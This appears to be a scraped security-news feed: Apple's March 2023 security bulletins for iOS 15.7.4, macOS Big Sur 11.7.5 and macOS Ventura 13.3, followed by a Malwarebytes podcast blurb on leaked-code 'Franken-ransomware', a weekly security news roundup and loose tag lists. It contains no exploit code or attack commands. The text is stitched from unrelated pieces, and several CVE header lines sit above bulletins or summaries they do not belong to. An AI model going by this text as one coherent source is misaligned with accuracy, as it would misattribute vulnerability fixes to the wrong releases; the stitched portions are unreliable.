This issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.3, iOS 15.7.4 and iPadOS 15.7.4, Safari 16.4, iOS 16.4 and iPadOS 16.4. A remote user may be able to cause unexpected app termination or arbitrary code execution

Released March 27, 2023

**Accessibility**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to access information about a user’s contacts

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-23541: Csaba Fitzl (@theevilbit) of Offensive Security

**Calendar**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: Importing a maliciously crafted calendar invitation may exfiltrate user information

Description: Multiple validation issues were addressed with improved input sanitization.

CVE-2023-27961: Rıza Sabuncu (@rizasabuncu)

**Camera**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: A sandboxed app may be able to determine which app is currently using the camera

Description: The issue was addressed with additional restrictions on the observability of app states.

CVE-2023-23543: Yiğit Can YILMAZ (@yilmazcanyigit)

**CommCenter**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2023-27936: Tingting Yin of Tsinghua University

**Find My**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to read sensitive location information

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-23537: an anonymous researcher

**FontParser**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-27956: Ye Zhang of Baidu Security

**Identity Services**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to access information about a user’s contacts

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-27928: Csaba Fitzl (@theevilbit) of Offensive Security

**ImageIO**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2023-27946: Mickey Jin (@patch1t)

**ImageIO**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-23535: ryuzaki

**Kernel**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to disclose kernel memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2023-28200: Arsenii Kostromin (0x3c3e)

Entry added May 1, 2023

**Kernel**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to disclose kernel memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2023-27941: Arsenii Kostromin (0x3c3e)

**Kernel**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2023-27969: Adam Doupé of ASU SEFCOM

**Kernel**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved bounds checks.

CVE-2023-23536: Félix Poulin-Bélanger

Entry added May 1, 2023

**Model I/O**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-27949: Mickey Jin (@patch1t)

**NetworkExtension**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: A user in a privileged network position may be able to spoof a VPN server that is configured with EAP-only authentication on a device

Description: The issue was addressed with improved authentication.

CVE-2023-28182: Zhuowei Zhang

**Shortcuts**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: A shortcut may be able to use sensitive data with certain actions without prompting the user

Description: The issue was addressed with additional permissions checks.

CVE-2023-27963: Jubaer Alnazi Jabin of TRS Group Of Companies, and Wenchao Li and Xiaolong Bai of Alibaba Group

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: A website may be able to track sensitive user information

Description: The issue was addressed by removing origin information.

WebKit Bugzilla: 250837  
CVE-2023-27954: an anonymous researcher

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

Description: A type confusion issue was addressed with improved checks.

WebKit Bugzilla: 251944  
CVE-2023-23529: an anonymous researcher

**WebKit Web Inspector**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved state management.

CVE-2023-28201: Dohyun Lee (@l33d0hyun), crixer (@pwning\_me) of SSD Labs

Entry added May 1, 2023

CVE-2023-28201: About the security content of iOS 15.7.4 and iPadOS 15.7.4

A validation issue was addressed with improved input sanitization. This issue is fixed in macOS Ventura 13.3, macOS Monterey 12.6.4, iOS 15.7.4 and iPadOS 15.7.4, macOS Big Sur 11.7.5. An app may be able to disclose kernel memory

Released March 27, 2023

**Apple Neural Engine**

Available for: macOS Big Sur

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-23540: Mohamed GHANNAM (@\_simo36)

**AppleAVD**

Available for: macOS Big Sur

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-26702: an anonymous researcher, Antonio Zekic (@antoniozekic), and John Aakerblom (@jaakerblom)

**AppleMobileFileIntegrity**

Available for: macOS Big Sur

Impact: A user may gain access to protected parts of the file system

Description: The issue was addressed with improved checks.

CVE-2023-23527: Mickey Jin (@patch1t)

**Archive Utility**

Available for: macOS Big Sur

Impact: An archive may be able to bypass Gatekeeper

Description: The issue was addressed with improved checks.

CVE-2023-27951: Brandon Dalton of Red Canary and Csaba Fitzl (@theevilbit) of Offensive Security

**Calendar**

Available for: macOS Big Sur

Impact: Importing a maliciously crafted calendar invitation may exfiltrate user information

Description: Multiple validation issues were addressed with improved input sanitization.

CVE-2023-27961: Rıza Sabuncu (@rizasabuncu)

**Carbon Core**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved checks.

CVE-2023-23534: Mickey Jin (@patch1t)

**ColorSync**

Available for: macOS Big Sur

Impact: An app may be able to read arbitrary files

Description: The issue was addressed with improved checks.

CVE-2023-27955: JeongOhKyea

**CommCenter**

Available for: macOS Big Sur

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2023-27936: Tingting Yin of Tsinghua University

**dcerpc**

Available for: macOS Big Sur

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: The issue was addressed with improved bounds checks.

CVE-2023-27935: Aleksandar Nikolic of Cisco Talos

**dcerpc**

Available for: macOS Big Sur

Impact: A remote user may be able to cause unexpected system termination or corrupt kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2023-27953: Aleksandar Nikolic of Cisco Talos

CVE-2023-27958: Aleksandar Nikolic of Cisco Talos

**Find My**

Available for: macOS Big Sur

Impact: An app may be able to read sensitive location information

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-23537: an anonymous researcher

**Foundation**

Available for: macOS Big Sur

Impact: Parsing a maliciously crafted plist may lead to an unexpected app termination or arbitrary code execution

Description: An integer overflow was addressed with improved input validation.

CVE-2023-27937: an anonymous researcher

**Identity Services**

Available for: macOS Big Sur

Impact: An app may be able to access information about a user’s contacts

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-27928: Csaba Fitzl (@theevilbit) of Offensive Security

**ImageIO**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2023-27946: Mickey Jin (@patch1t)

**ImageIO**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-23535: ryuzaki

**Kernel**

Available for: macOS Big Sur

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2023-23514: Xinru Chi of Pangu Lab and Ned Williamson of Google Project Zero

**Kernel**

Available for: macOS Big Sur

Impact: An app may be able to disclose kernel memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2023-28200: Arsenii Kostromin (0x3c3e)

**NetworkExtension**

Available for: macOS Big Sur

Impact: A user in a privileged network position may be able to spoof a VPN server that is configured with EAP-only authentication on a device

Description: The issue was addressed with improved authentication.

CVE-2023-28182: Zhuowei Zhang

**PackageKit**

Available for: macOS Big Sur

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved checks.

CVE-2023-27962: Mickey Jin (@patch1t)

**System Settings**

Available for: macOS Big Sur

Impact: An app may be able to access user-sensitive data

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-23542: an anonymous researcher

**System Settings**

Available for: macOS Big Sur

Impact: An app may be able to read sensitive location information

Description: A permissions issue was addressed with improved validation.

CVE-2023-28192: Guilherme Rambo of Best Buddy Apps (rambo.codes)

**Vim**

Available for: macOS Big Sur

Impact: Multiple issues in Vim

Description: Multiple issues were addressed by updating to Vim version 9.0.1191.

CVE-2023-0433

CVE-2023-0512

**XPC**

Available for: macOS Big Sur

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with a new entitlement.

CVE-2023-27944: Mickey Jin (@patch1t)

CVE-2023-28200: About the security content of macOS Big Sur 11.7.5

A privacy issue was addressed by moving sensitive data to a more secure location. This issue is fixed in macOS Ventura 13.3. An app may be able to access user-sensitive data

Released March 27, 2023

**AMD**

Available for: macOS Ventura

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2023-27968: ABC Research s.r.o.

**Apple Neural Engine**

Available for: macOS Ventura

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with improved checks.

CVE-2023-23532: Mohamed Ghannam (@\_simo36)

**AppleMobileFileIntegrity**

Available for: macOS Ventura

Impact: A user may gain access to protected parts of the file system

Description: The issue was addressed with improved checks.

CVE-2023-23527: Mickey Jin (@patch1t)

**AppleMobileFileIntegrity**

Available for: macOS Ventura

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed by removing the vulnerable code.

CVE-2023-27931: Mickey Jin (@patch1t)

**Archive Utility**

Available for: macOS Ventura

Impact: An archive may be able to bypass Gatekeeper

Description: The issue was addressed with improved checks.

CVE-2023-27951: Brandon Dalton (@partyD0lphin) of Red Canary and Csaba Fitzl (@theevilbit) of Offensive Security

Entry updated May 1, 2023

**Calendar**

Available for: macOS Ventura

Impact: Importing a maliciously crafted calendar invitation may exfiltrate user information

Description: Multiple validation issues were addressed with improved input sanitization.

CVE-2023-27961: Rıza Sabuncu - twitter.com/rizasabuncu

**Camera**

Available for: macOS Ventura

Impact: A sandboxed app may be able to determine which app is currently using the camera

Description: The issue was addressed with additional restrictions on the observability of app states.

CVE-2023-23543: Yiğit Can YILMAZ (@yilmazcanyigit)

**Carbon Core**

Available for: macOS Ventura

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved checks.

CVE-2023-23534: Mickey Jin (@patch1t)

**ColorSync**

Available for: macOS Ventura

Impact: An app may be able to read arbitrary files

Description: The issue was addressed with improved checks.

CVE-2023-27955: JeongOhKyea

**CommCenter**

Available for: macOS Ventura

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2023-27936: Tingting Yin of Tsinghua University

**CoreCapture**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-28181: Tingting Yin of Tsinghua University

**curl**

Available for: macOS Ventura

Impact: Multiple issues in curl

Description: Multiple issues were addressed by updating curl.

CVE-2022-43551

CVE-2022-43552

**dcerpc**

Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: A memory initialization issue was addressed.

CVE-2023-27934: Aleksandar Nikolic of Cisco Talos

**dcerpc**

Available for: macOS Ventura

Impact: A user in a privileged network position may be able to cause a denial-of-service

Description: A denial-of-service issue was addressed with improved memory handling.

CVE-2023-28180: Aleksandar Nikolic of Cisco Talos

**dcerpc**

Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: The issue was addressed with improved bounds checks.

CVE-2023-27935: Aleksandar Nikolic of Cisco Talos

**dcerpc**

Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected system termination or corrupt kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2023-27953: Aleksandar Nikolic of Cisco Talos

CVE-2023-27958: Aleksandar Nikolic of Cisco Talos

**Display**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2023-27965: Proteas of Pangu Lab

**FaceTime**

Available for: macOS Ventura

Impact: An app may be able to access user-sensitive data

Description: A privacy issue was addressed by moving sensitive data to a more secure location.

CVE-2023-28190: Joshua Jones

**Find My**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-23537: an anonymous researcher

**FontParser**

Available for: macOS Ventura

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-27956: Ye Zhang of Baidu Security

**Foundation**

Available for: macOS Ventura

Impact: Parsing a maliciously crafted plist may lead to an unexpected app termination or arbitrary code execution

Description: An integer overflow was addressed with improved input validation.

CVE-2023-27937: an anonymous researcher

**iCloud**

Available for: macOS Ventura

Impact: A file from an iCloud shared-by-me folder may be able to bypass Gatekeeper

Description: This was addressed with additional checks by Gatekeeper on files downloaded from an iCloud shared-by-me folder.

CVE-2023-23526: Jubaer Alnazi of TRS Group of Companies

**Identity Services**

Available for: macOS Ventura

Impact: An app may be able to access information about a user’s contacts

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-27928: Csaba Fitzl (@theevilbit) of Offensive Security

**ImageIO**

Available for: macOS Ventura

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-23535: ryuzaki

**ImageIO**

Available for: macOS Ventura

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-27929: Meysam Firouzi (@R00tkitSMM) of Mbition Mercedes-Benz Innovation Lab and jzhu working with Trend Micro Zero Day Initiative

**ImageIO**

Available for: macOS Ventura

Impact: Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2023-27946: Mickey Jin (@patch1t)

**ImageIO**

Available for: macOS Ventura

Impact: Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2023-27957: Yiğit Can YILMAZ (@yilmazcanyigit)

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved bounds checks.

CVE-2023-23536: Félix Poulin-Bélanger

Entry added May 1, 2023

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2023-23514: Xinru Chi of Pangu Lab and Ned Williamson of Google Project Zero

CVE-2023-27969: Adam Doupé of ASU SEFCOM

**Kernel**

Available for: macOS Ventura

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-27933: sqrtpwn

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to disclose kernel memory

Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation.

CVE-2023-27941: Arsenii Kostromin (0x3c3e)

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to disclose kernel memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2023-28200: Arsenii Kostromin (0x3c3e)

**LaunchServices**

Available for: macOS Ventura

Impact: Files downloaded from the internet may not have the quarantine flag applied

Description: This issue was addressed with improved checks.

CVE-2023-27943: an anonymous researcher, Brandon Dalton, Milan Tenk, and Arthur Valiev

**LaunchServices**

Available for: macOS Ventura

Impact: An app may be able to gain root privileges

Description: This issue was addressed with improved checks.

CVE-2023-23525: Mickey Jin (@patch1t)

**Mail**

Available for: macOS Ventura

Impact: An app may be able to view sensitive information

Description: The issue was addressed with improved checks.

CVE-2023-28189: Mickey Jin (@patch1t)

Entry added May 1, 2023

**Model I/O**

Available for: macOS Ventura

Impact: Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-27949: Mickey Jin (@patch1t)

**NetworkExtension**

Available for: macOS Ventura

Impact: A user in a privileged network position may be able to spoof a VPN server that is configured with EAP-only authentication on a device

Description: The issue was addressed with improved authentication.

CVE-2023-28182: Zhuowei Zhang

**PackageKit**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved checks.

CVE-2023-23538: Mickey Jin (@patch1t)

CVE-2023-27962: Mickey Jin (@patch1t)

**Photos**

Available for: macOS Ventura

Impact: Photos belonging to the Hidden Photos Album could be viewed without authentication through Visual Lookup

Description: A logic issue was addressed with improved restrictions.

CVE-2023-23523: developStorm

**Podcasts**

Available for: macOS Ventura

Impact: An app may be able to access user-sensitive data

Description: The issue was addressed with improved checks.

CVE-2023-27942: Mickey Jin (@patch1t)

**Safari**

Available for: macOS Ventura

Impact: An app may bypass Gatekeeper checks

Description: A race condition was addressed with improved locking.

CVE-2023-27952: Csaba Fitzl (@theevilbit) of Offensive Security

**Sandbox**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved checks.

CVE-2023-23533: Mickey Jin (@patch1t), Koh M. Nakagawa of FFRI Security, Inc., and Csaba Fitzl (@theevilbit) of Offensive Security

**Sandbox**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: A logic issue was addressed with improved validation.

CVE-2023-28178: Yiğit Can YILMAZ (@yilmazcanyigit)

**SharedFileList**

Available for: macOS Ventura

Impact: An app may be able to break out of its sandbox

Description: The issue was addressed with improved checks.

CVE-2023-27966: an anonymous researcher

Entry added May 1, 2023

**Shortcuts**

Available for: macOS Ventura

Impact: A shortcut may be able to use sensitive data with certain actions without prompting the user

Description: The issue was addressed with additional permissions checks.

CVE-2023-27963: Jubaer Alnazi Jabin of TRS Group Of Companies, and Wenchao Li and Xiaolong Bai of Alibaba Group

**System Settings**

Available for: macOS Ventura

Impact: An app may be able to access user-sensitive data

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-23542: an anonymous researcher

**System Settings**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: A permissions issue was addressed with improved validation.

CVE-2023-28192: Guilherme Rambo of Best Buddy Apps (rambo.codes)

**TCC**

Available for: macOS Ventura

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed by removing the vulnerable code.

CVE-2023-27931: Mickey Jin (@patch1t)

**Vim**

Available for: macOS Ventura

Impact: Multiple issues in Vim

Description: Multiple issues were addressed by updating to Vim version 9.0.1191.

CVE-2023-0049

CVE-2023-0051

CVE-2023-0054

CVE-2023-0288

CVE-2023-0433

CVE-2023-0512

**WebKit Web Inspector**

Available for: macOS Ventura

Impact: A remote attacker may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved state management.

CVE-2023-28201: Dohyun Lee (@l33d0hyun) and crixer (@pwning\_me) of SSD Labs

Entry added May 1, 2023

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may bypass Same Origin Policy

Description: This issue was addressed with improved state management.

CVE-2023-27932: an anonymous researcher

**WebKit**

Available for: macOS Ventura

Impact: A website may be able to track sensitive user information

Description: The issue was addressed by removing origin information.

CVE-2023-27954: an anonymous researcher

**XPC**

Available for: macOS Ventura

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with a new entitlement.

CVE-2023-27944: Mickey Jin (@patch1t)

CVE-2023-28190: About the security content of macOS Ventura 13.3

This week on Lock and Code, we speak with Allan Liska about a new trend in ransomware delivery and development, and why it presents new challenges to organizations and law enforcement investigators. 



(Read more...)




The post The rise of "Franken-ransomware," with Allan Liska: Lock and Code S04E11  appeared first on Malwarebytes Labs.

Ransomware is becoming bespoke, and that could mean trouble for businesses and law enforcement investigators. 

It wasn't always like this. 

For a few years now, ransomware operators have congregated around a relatively new model of crime called "Ransomware-as-a-Service." In the Ransomware-as-a-Service model, or RaaS model, ransomware itself is not delivered to victims by the same criminals that make the ransomware. Instead, it is used almost "on loan" by criminal groups called "affiliates" who carry out attacks with the ransomware and, if successful, pay a share of their ill-gotten gains back to the ransomware’s creators.

This model allows ransomware developers to significantly increase their reach and their illegal hauls. By essentially leasing out their malicious code to smaller groups of cybercriminals around the world, the ransomware developers can carry out more attacks, steal more money from victims, and avoid any isolated law enforcement action that would put their business in the ground, as the arrest of one affiliate group won't stop the work of dozens of others. 

And not only do ransomware developers lean on other cybercriminals to carry out attacks, they also rely on an entire network of criminals to carry out smaller, specialized tasks. There are "Initial Access Brokers" who break into company networks and then sell that illegal method of access online. "You also have coders that you can contract out to," Liska said. "You have pen testers that you can contract out to. You can contract negotiators if you want. You can contract translators if you want."

But as Liska explained, as the ransomware "business" spreads out, so do new weak points: disgruntled criminals. 

"This whole underground marketplace that exists to serve ransomware means that your small group can do a lot," Liska said. "But that also means that you are entrusting the keys to your kingdom to these random contractors that you're paying in Bitcoin every now and then. And that, for example, is why the LockBit code got leaked—dude didn't pay his contractor."

With plenty of leaked code now circulating online, some smaller cybercriminals gangs have taken to making minor alterations and then sending that new variant of ransomware out into the world—no affiliate model needed.  

> "Most of what we see is just repurposed code and we see a lot of what I call 'Franken-ransomware.'" 

Today, on the Lock and Code podcast with host David Ruiz, Liska explains why Franken-ransomware poses unique challenges to future victims, cybersecurity companies, and law enforcement investigators. 

Tune in today.

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

The rise of "Franken-ransomware," with Allan Liska: Lock and Code S04E11 

Plus: Apple and Google plan to stop AirTag stalking, Meta violated the FTC’s privacy order, and how to tell if your car is tracking you.

In December 2020, security giant Mandiant revealed it had been hacked. Its disclosure was the first public sign of the SolarWinds hack, a Russian-orchestrated supply chain attack that's widely regarded as one of the biggest espionage hacks ever. Among its victims were the US Departments of Homeland Security, Energy, and Justice. This blow-by-blow retelling of the historic SolarWinds attack, from Kim Zetter, charts the ways the hackers pulled off the attack—and how they were eventually caught.

Anti-abortion group the American College of Pediatricians (ACPeds) suffered a significant data breach this week. The doctors' organization, which sued the US government to ban the abortion drug mifepristone, left an unsecured Google Drive on its website, exposing a decade's worth of email exchanges, financial and tax records, and more sensitive data. The details give an unprecedented view of the organization, which has been described as a “hate group” for its views on LGBTQ people.  While ACPeds—which is not a school at all—characterizes itself as a “scientific organization,” leaked records show its deeply evangelical Christian mission.

Security experts have promised a future where passwords will cease to exist for the best part of a decade. However, that reality took a big step forward this week—really!—as Google launched passkey logins for billions of people. The technique uses cryptographic keys that are stored on your devices to replace your old, insecure passwords.

Elsewhere, cops in the US, Europe, and nine other countries have arrested 288 people for their involvement in the dark web drug markets, including the site Monopoly Market, which was quietly taken offline in 2021. Facebook owner Meta has added new tools to its business accounts in an attempt to thwart bad actors abusing them, including who can become account administrators and access lines of credit.

But that’s not all. Each week, we round up the news we didn’t report in-depth ourselves. Click on the headlines to read the full stories. And stay safe out there.

Russian ships with underwater operations equipment have been identified as being near the sites of the Nord Stream gas pipeline explosions in the days before the blasts, according to a joint investigation from national broadcasters in Denmark, Norway, Sweden, and Finland. Journalists at the publications combined intercepted radio broadcasts from the ships with satellite images to pinpoint their locations and track their paths. It is the latest example of investigators piecing together different sources of data, from varying unconnected sources, to reveal new details about real-world events.

Three ships, according to the investigation, sailed from naval bases in Russia to near the blast sites in June and September 2022. All of the ships had turned off their location tracking AIS services, an act often described as “going dark” and commonly used for disguising activity. Among the vessels were the navy research ship Sibiryakov and a tugboat called SB-123, which is said to be capable of launching mini-submarines. (In November 2022, WIRED reported on the presence of “ghost ships” around the time of the explosions, but had no information on their identity.)

Separately, another Russian vessel, the SS-750, was near the pipelines four days before they were blown up. In response to a public records request, the Danish Defense Command confirmed to the Information, a Danish news site, that it had 26 photos of the SS-750 near the sites.

Since the explosions at the Nord Stream 1 and 2 pipelines in September, there has been no official confirmation, with supporting evidence, of who may have been behind the blasts. The investigation from the Nordic journalists says the ships’ behavior was unusual but does not conclude what they were doing near the Nord Stream sites. Russia has denied being involved in the attacks, pointing fingers at both the UK and US. Other reports have claimed a pro-Ukranian group may have conducted the attack, which Ukraine has denied. Official investigations into the blasts are still ongoing in multiple European countries and the exact cause of the explosions is still unclear.

The US Federal Trade Commission is planning to impose a “blanket ban” on Meta and its companies—Instagram, Messenger, Facebook, WhatsApp, and VR firm Horizon Worlds—from making money from the data of people under 18. This could potentially mean the company would not be able to use data from these users to show them targeted advertisements and could only use the information it collects for providing its services or security purposes. The FTC also says that Meta would not be able to start using data collected before people turned 18 for commercial purposes.

The proposal comes as the FTC alleged Meta hasn’t complied with a previous 2020 privacy order it agreed to as part of a $5 billion settlement. In a statement, the FTC says Meta has “misled parents about their ability to control with whom their children communicated through its Messenger Kids app, and misrepresented the access it provided some app developers to private user data.” The proposed changes would be a modification to the FTC’s previous order, and it says it may also limit how Meta uses face recognition technology and require it to provide extra protection for users. Mark Zuckerberg’s firm has 30 days to respond to the FTC, which then may alter its plans.

How do you know if you are being stalked with an AirTag? If you have an iPhone running a newish version of iOS, then you should receive push notifications if an AirTag that doesn’t belong to you is following you around. However, if you own an Android device, you have to go through the extra step of downloading an app to discover if you are being tracked—a high burden for people in potentially abusive situations. Apple and Google said this week they are now working together to create a common standard for all phones to detect Bluetooth trackers that are being used to stalk or harass people. The proposal is also backed by Samsung and Bluetooth tracker manufacturers. The plan comes years after Apple’s cheap devices were first released without the additional privacy protections Apple added after the AirTags launch.

In 2017, the NotPetya cyberattack—the most devastating in history—caused more than $10 billion in damage to the companies and organizations it impacted. Among them was pharmaceutical giant Merck, which lost hundreds of millions of dollars as a result of the malware. This week, a New Jersey court ruled that Merck's insurers have to cover losses from the cyberattack. The insurers had argued the use of the malware, which has been linked to Russia, should be considered a warlike act and, as a result, would not fall under insurance policies.

The judges didn't agree. “The exclusion of damages caused by hostile or warlike action by a government or sovereign power in times of war or peace requires the involvement of military action,” they wrote in a decision. “Coverage could only be excluded here if we stretched the meaning of 'hostile' to its outer limit.” The decision comes as US president Joe Biden's administration looks to shift the liability for security issues to companies that are impacted.

Whether you know it or not, your car is a data goldmine. Within a few minutes, it is possible to "fingerprint" you based on the data your vehicle collects. Some consider the amount of data that vehicles grab a national security threat. A new free tool, from vehicle privacy company Privacy4Cars, aims to reveal how much data your car and its manufacturer can collect about you. Entering your vehicle identification number (VIN) into the tool will tell you whether your car collects "identifiers, location data, biometrics, and data synced from mobile phones," as well as what data manufacturers sell to third parties, such as data brokers.

Russian ‘Ghost Ships’ Identified Near the Nord Stream Blasts

Categories: News
Categories: Privacy
Tags: Google

Tags:  Apple

Tags:  AirTag

Tags:  Tile

Tags:  Samsung

Tags:  Bluetooth

Tags:  trackers

Tags:  stalking

Tags:  car thieves

Google and Apple want to create a specification for tech that alerts users when they're being tracked by AirTags and similar devices.



(Read more...)




The post Google and Apple cooperate to address unwanted tracking  appeared first on Malwarebytes Labs.

